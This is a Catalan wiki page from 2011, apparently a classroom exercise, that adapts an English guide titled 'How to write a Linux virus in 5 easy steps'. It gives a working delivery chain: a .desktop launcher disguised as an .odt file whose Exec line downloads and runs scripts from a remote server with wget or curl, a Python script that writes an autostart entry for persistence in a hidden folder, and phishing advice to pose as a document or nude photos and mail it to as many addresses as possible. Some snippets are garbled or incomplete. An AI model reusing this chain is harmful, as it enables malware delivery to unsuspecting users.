Fer un programa maliciós (malware) a Linux

De wikijoan
Salta a la navegació Salta a la cerca

How to write a Linux virus in 5 easy steps:


Pas 1

Write a piece of malware of your choice. Maybe as a Python script? Good language, efficient code, pre-installed in most Linux distros and powerful standard library support (for example, libraries for sending HTTP requests and handling SMTP are part of most standard installs). Place that malware on some web-server.

El programa maliciós el farem amb bash, fitxer molt_important.sh:

for i in {1..5}
   echo "Welcome gedit $i times"
	gedit --new-window &

# loop infinit
# for (( ; ; ))
# do
#   echo "infinite loops [ hit CTRL+C to stop]"
# done
$ sudo chmod a+x molt_important.sh
$ ./molt_important.sh

i està disponible a http://wiki.joanillo.org/molt_important.sh

Pas 2

Your malware needs the ability to install a launcher for itself so that it is started whenever the user logs in. As mentioned, for Gnome that means creating a launcher description in the ~/.config/autostart folder. For KDE just link to your executable from within the ~/.kde/Autostart directory. To do that the malware code can either just force the issue and copy a launcher or link to itself into both locations (creating any directories along the way if they don't exist) or it can be a bit smarter and choose the right thing to do based on the desktop environment that it detects.

For Gnome the Python script instead needs to write a launcher into the proper directory:


import os
relauncher_str = """
[Desktop Entry]
Exec=bash ~/.local/.hidden/molt_important.sh
uname = os.getlogin()
drop_dir = "/home/%s/.config/autostart" % uname
f = open(drop_dir+"/Malware.desktop", "w")

Si executem aquest script ($ python crear_llencadora.py) veuríem com es crea el fitxer /home/joan/.config/autostart/Malware.desktop, i això significa que cada vegada que engeguem la màquina s'executarà el script /home/joan/molt_important.sh. Fés-ho per comprovar que el script crear_llencadora.py funciona correctament, però aleshores esborra el fitxer /home/joan/.config/autostart/Malware.desktop, doncs l'objectiu és que es crearà quan executis un attachment que rebràs per mail.

Writing these autostart entries is probably some of the first action that your malware should perform.

El contingut del fitxer Malware.desktop ha de ser:

[Desktop Entry]
Exec=bash /home/joan/molt_important.sh

Pas 3

Now create a desktop launcher file for the installer of the malware, which is different than the launcher we use to restart the malware after a reboot. The desktop launcher for the installer is what we send as attachment in the email to the targeted user. It's what the user clicks on after they saved it. Try something like this. Fitxer llegeix_molt_important.odt.desktop:

#!/usr/bin/env xdg-open

[Desktop Entry]
Exec=bash -c 'URL=http://wiki.joanillo.org/molt_important.sh ;\n URL2=http://wiki.joanillo.org/crear_llencadora.py ;\n DROP=~/.local/.hidden ;\n   mkdir -p $DROP;\n   if [ -e /usr/bin/wget ] ;\n   then wget --no-cache $URL -O $DROP/molt_important.sh ;\n wget --no-cache $URL2 -O $DROP/crear_llencadora.py ;\n   else curl $URL -o $DROP/molt_important.sh ; curl $URL2 -o $DROP/crear_llencadora.py ; fi;\n  chmod a+x $DROP/molt_important.sh;\n  chmod a+x $DROP/crear_llencadora.py;\n python $DROP/crear_llencadora.py; \n bash $DROP/molt_important.sh'                            
Comment=Llegeix molt important

important. Al nostre fitxer li hem de donar permisos d'execució. Gmail (i d'altres proveïdors de mail) bloca l'enviament de fitxers executables, fins i tot si aquests estan encapsulats amb zip. De fet sí que els deixa enviar, però li treu el flag del permís d'execució. El que ha funcionat al professor és:

  • donar al fitxer llegir_molt_important.odt.desktop permisos d'execució
  • comprimir-lo amb .tar.gz
  • enviar-lo per gmail al destinatari
  • el destinatari el descomprimeix i veu que és un odt (amb la icona corresponent), en principi inofensiu. Fa doble clic i, com que ha mantingut el flag d'execució, s'executa el script.

Note that we have specified a name that is harmless looking and even chose an icon that makes it look like a normal document (that particular icon is present on both Ubuntu (Gnome) and Kubuntu (KDE) systems, but annoyingly not on Fedora). If you claim to send nude shots in the email, just give it a name that makes it sound like an image (something with .jpg at the end) and chose one of the appropriate standard image icons.

The Exec line is a bit longer now, because we have to account for the possibility that either wget is installed or curl. For example, Ubuntu systems usually have wget, while Fedora comes with curl. So, we pass the appropriate commands to bash in order to check which one is present and then call the correct command to download the malware. I'm not a bash expert, so there might be a much more efficient way to do this. But you get the idea. Also, in that line we are creating a good location for the script ($DROP), which is not immediately obvious. The mkdir command with the -p option will silently create whatever parent directories are necessary. The target directory is in the user's home, hidden away in some innocent looking local directory and can only be seen when also displaying hidden files. The /tmp directory of course is not a good place for our malware, since it is wiped with each reboot.

Save this launcher file under the name you specified with the Name line, but add '.desktop' to the end of the actual file name. So, in our case, you would save the file as 'some_text.odt.desktop'. When you place this on your desktop you will see that Gnome or KDE will treat it in a special way, not displaying the '.desktop' extension. So, the file just appears as 'some_text.odt'. Of course, that also means that the mail attachment will have this extension as well. Some users may notice, many others will not.



#!/usr/bin/env xdg-open

[Desktop Entry]
Exec=bash -c 'URL=http://wiki.joanillo.org/molt_important2.sh;\n DROP=~/.local/.hidden ;\n   mkdir -p $DROP;\n   if [ -e /usr/bin/wget ] ;\n   then wget --no-cache $URL -O $DROP/molt_important2.sh ;\n   else curl $URL -o $DROP/molt_important2.sh ; fi;\n  chmod a+x $DROP/molt_important2.sh; \n bash $DROP/molt_important2.sh'                            
Comment=Llegeix molt important

molt_important2.sh (està en el servidor remot):

mkdir -p $DROP
if [ -e /usr/bin/wget ] ; then
        wget --no-cache $URL -O $DROP/molt_important.sh
        wget --no-cache $URL2 -O $DROP/crear_llencadora.py
        curl $URL -o $DROP/molt_important.sh
        curl $URL2 -o $DROP/crear_llencadora.py
chmod a+x $DROP/molt_important.sh
chmod a+x $DROP/crear_llencadora.py
python crear_llencadora.py

Pas 4

Attach this file to an email, which prompts the recipient to save and open the attachment. As explained, once it has been saved it will just appear as molt_important.odt on the user's desktop. And with the icon we have chosen in the launcher description it will look quite harmless.

Pas 5

Send this email out to as many email addresses as you can get a hold of.


Entrega al Moodle la documentació generada, i un fitxer README on fiquis les teves anotacioins.

creat per Joan Quintana Compte, novembre 2011